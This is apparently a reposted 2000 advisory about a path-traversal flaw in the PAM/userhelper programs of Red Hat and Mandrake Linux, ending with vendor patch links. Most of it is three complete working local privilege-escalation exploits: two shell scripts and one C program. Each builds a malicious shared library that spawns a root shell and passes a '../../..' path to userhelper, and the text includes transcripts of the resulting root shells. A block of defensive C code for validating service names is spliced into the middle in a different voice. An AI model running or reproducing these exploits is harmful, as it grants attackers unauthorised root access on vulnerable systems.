From: ilyyz()
Compiled by: (2000-04-24 23:55:41), internal mail
The following issue is based on a security finding by L0pht. Two programs in the "usermode-1.15" package, "pam" and "userhelper", both have security problems.
"pam" allows anyone to download any file from the host, while "userhelper" allows anyone to obtain root illegitimately.
Here is the related exploit:
#!/bin/sh
#
# pamslam - vulnerability in Redhat Linux 6.1 and PAM pam_start
# found by [email protected]
#
# synopsis:
# both 'pam' and 'userhelper' (a setuid binary that comes with the
# 'usermode-1.15' rpm) follow .. paths. Since pam_start calls down to
# _pam_add_handler(), we can get it to dlopen any file on disk. 'userhelper'
# being setuid means we can get root.
#
# fix:
# No fuckin idea for a good fix. Get rid of the .. paths in userhelper
# for a quick fix. Remember 'strcat' isn't a very good way of confining
# a path to a particular subdirectory.
#
# props to my mommy and daddy, cuz they made me drink my milk.
cat > _pamslam.c << EOF
#include<stdlib.h>
#include<unistd.h>
#include<sys/types.h>
void _init(void)
{
setuid(geteuid());
system("/bin/sh");
}
EOF
echo -n .
echo -e auth\\trequired\\t$PWD/_pamslam.so > _pamslam.conf
chmod 755 _pamslam.conf
echo -n .
gcc -fPIC -o _pamslam.o -c _pamslam.c
echo -n o
ld -shared -o _pamslam.so _pamslam.o
echo -n o
chmod 755 _pamslam.so
echo -n O
rm _pamslam.c
rm _pamslam.o
echo O
/usr/sbin/userhelper -w ../../..$PWD/_pamslam.conf
sleep 1s
rm _pamslam.so
rm _pamslam.conf
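The fix note above makes the defensive point: strcat-style concatenation does not confine a path to a directory, because a service name containing ".." components walks straight out of it. The C program below is an added example, not code from the original post nor from PAM or usermode, showing a concatenation-only lookup next to a checked one that only accepts a plain file name. The directory CONF_DIR, the function names and the sample inputs are assumptions constructed for the illustration.

```c
#include <ctype.h>
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

/* Added illustration, not code from PAM or usermode. The directory and the
 * function names are assumptions chosen for this example. */
#define CONF_DIR "/etc/pam.d"

/* Concatenation-only lookup in the spirit of the strcat pattern the fix
 * note warns about: whatever the caller passes as the service name lands
 * in the path unchanged, so "../.." walks out of CONF_DIR. */
int concat_only_path(const char *service, char *out, size_t outlen)
{
    if (strlen(CONF_DIR) + 1 + strlen(service) + 1 > outlen)
        return -1;
    strcpy(out, CONF_DIR);
    strcat(out, "/");
    strcat(out, service);
    return 0;
}

/* Service-name check: a PAM service is a single file name inside CONF_DIR,
 * so reject anything that is not a plain name. Returns true when safe. */
bool service_name_is_safe(const char *service)
{
    size_t len;
    if (service == NULL)
        return false;
    len = strlen(service);
    if (len == 0 || len > 64)
        return false;
    /* "." and ".." are directory entries, never service files */
    if (strcmp(service, ".") == 0 || strcmp(service, "..") == 0)
        return false;
    for (const char *p = service; *p != '\0'; ++p) {
        unsigned char c = (unsigned char)*p;
        /* '/' is not in the allowed set, so no component can leave CONF_DIR */
        if (!isalnum(c) && c != '-' && c != '_' && c != '.')
            return false;
    }
    return true;
}

/* Checked lookup: validate first, then build, then confirm the result is
 * CONF_DIR followed by exactly one more path component. */
int checked_path(const char *service, char *out, size_t outlen)
{
    if (!service_name_is_safe(service))
        return -1;
    if (concat_only_path(service, out, outlen) != 0)
        return -1;
    /* Defense in depth: the only '/' after the prefix must be the joiner. */
    if (strncmp(out, CONF_DIR "/", strlen(CONF_DIR) + 1) != 0 ||
        strchr(out + strlen(CONF_DIR) + 1, '/') != NULL)
        return -1;
    return 0;
}

int main(void)
{
    /* Constructed inputs: a normal service name, the traversal form the
     * scripts above hand to userhelper -w, and a few degenerate names. */
    const char *inputs[] = { "login", "../../../tmp/login", "..", "a/b", "" };
    char buf[256];
    for (size_t i = 0; i < sizeof inputs / sizeof inputs[0]; ++i) {
        int rc = checked_path(inputs[i], buf, sizeof buf);
        printf("%-22s -> %s\n", inputs[i], rc == 0 ? buf : "rejected");
    }
    return 0;
}
```

The important design choice is that the check runs on the service name before any path is built, and the post-build prefix test is only a second line of defense; a check that merely searches the finished string for "../" is easy to get wrong, whereas refusing '/' in the name makes every traversal form impossible by construction.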
Derek Callaway posted another userhelper/PAM exploit:
#!/bin/sh
# userrooter.sh by S <[email protected]>
# RedHat PAM/userhelper(8) exploit
# Hi to inNUENdo!
LAME=`rpm -qf /usr/sbin/userhelper | awk -F'-' '{print $2}' | awk -F'.' '{print $2}'`
if [ $LAME -gt 15 ]
then echo "Machine doesn't appear to be vulnerable :-\\"
echo "Trying anyway..."
fi
cat << EOF >/tmp/hello-root.c
#include<unistd.h>
#include<stdlib.h>
void pam_sm_authenticate(void){
setuid(0);
puts("userrooter by S");
system("/bin/sh");
exit(EXIT_SUCCESS);
}
void pam_sm_setcred(void){
setuid(0);
puts("userrooter by S");
system("/bin/sh");
exit(EXIT_SUCCESS);
}
EOF
cat << EOF >/tmp/login
#%PAM-1.0
auth required /tmp/pamper.so
EOF
gcc -shared -fPIC -O2 -o /tmp/pamper.so /tmp/hello-root.c
rm /tmp/hello-root.c
chmod 0700 /tmp/login
/usr/sbin/userhelper -w ../../../tmp/login
rm /tmp/pamper.so
rm /tmp/login
--------------------------------------------------------------------------------
/*
* pam-mdk.c (C) 2000 Paulo Ribeiro
*
* DESCRIPTION:
* -----------
* Mandrake Linux 6.1 has the same problem as Red Hat Linux 6.x but its
* exploit (pamslam.sh) doesn't work on it (at least on my machine). So,
* I created this C program based on it which exploits PAM/userhelper
* and gives you UID 0.
*
* SYSTEMS TESTED:
* --------------
* Red Hat Linux 6.0, Red Hat Linux 6.1, Mandrake Linux 6.1.
*
* RESULTS:
* -------
* [prrar@linux prrar]$ id
* uid=501(prrar) gid=501(prrar) groups=501(prrar)
* [prrar@linux prrar]$ gcc pam-mdk.c -o pam-mdk
* [prrar@linux prrar]$ ./pam-mdk
* sh-2.03# id
* uid=0(root) gid=501(prrar) groups=501(prrar)
* sh-2.03#
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h> /* strcpy */
#include <unistd.h>
int main(int argc, char *argv[])
{
FILE *fp;
strcpy(argv[0], "vi test.txt");
fp = fopen("abc.c", "a");
fprintf(fp, "#include<stdlib.h>\n");
fprintf(fp, "#include<unistd.h>\n");
fprintf(fp, "#include<sys/types.h>\n");
fprintf(fp, "void _init(void) {\n");
fprintf(fp, "\tsetuid(geteuid());\n");
fprintf(fp, "\tsystem(\"/bin/sh\");\n");
fprintf(fp, "}");
fclose(fp);
system("echo -e auth\trequired\t$PWD/abc.so > abc.conf");
system("chmod 755 abc.conf");
system("gcc -fPIC -o abc.o -c abc.c");
system("ld -shared -o abc.so abc.o");
system("chmod 755 abc.so");
system("/usr/sbin/userhelper -w ../../..$PWD/abc.conf");
system("rm -rf abc.*");
return 0;
}
/* pam-mdk.c: EOF */
Mandrake 6.0 also appears to be affected:
[darron@maul darron]$ gcc pam-mdk.c -o pam-mdk
[darron@maul darron]$ ./pam-mdk
sh-2.03# id
uid=0(root) gid=502(admin) groups=502(admin)
sh-2.03#
[darron@maul /etc]$ cat mandrake-release
Linux Mandrake release 6.0 (Venus)
Solution
For RedHat
Intel:
ftp://updates.redhat.com/6.1/i386/pam-0.68-10.i386.rpm
ftp://updates.redhat.com/6.1/i386/usermode-1.17-1.i386.rpm
Alpha:
ftp://updates.redhat.com/6.1/alpha/pam-0.68-10.alpha.rpm
ftp://updates.redhat.com/6.1/alpha/usermode-1.17-1.alpha.rpm
Sparc:
ftp://updates.redhat.com/6.1/sparc/pam-0.68-10.sparc.rpm
ftp://updates.redhat.com/6.1/sparc/usermode-1.17-1.sparc.rpm
Source packages:
ftp://updates.redhat.com/6.1/SRPMS/pam-0.68-10.src.rpm
ftp://updates.redhat.com/6.1/SRPMS/usermode-1.17-1.src.rpm
For Turbo Linux:
rpm -Fvh ftp://ftp.turbolinux.com/pub/updates/6.0/security/pam-0.72-3.i386.rpm
rpm -Fvh ftp://ftp.turbolinux.com/pub/updates/6.0/security/usermode-1.18-1.i386.rpm
The source rpms can be downloaded here:
ftp://ftp.turbolinux.com/pub/updates/6.0/SRPMS/pam-0.72-3.src.rpm
ftp://ftp.turbolinux.com/pub/updates/6.0/SRPMS/usermode-1.18-1.src.rpm
Related sites
http://www.l0pht.com
※ Source: Moon-soft software site http://www.moon-soft.com [FROM: 202.96.191.50]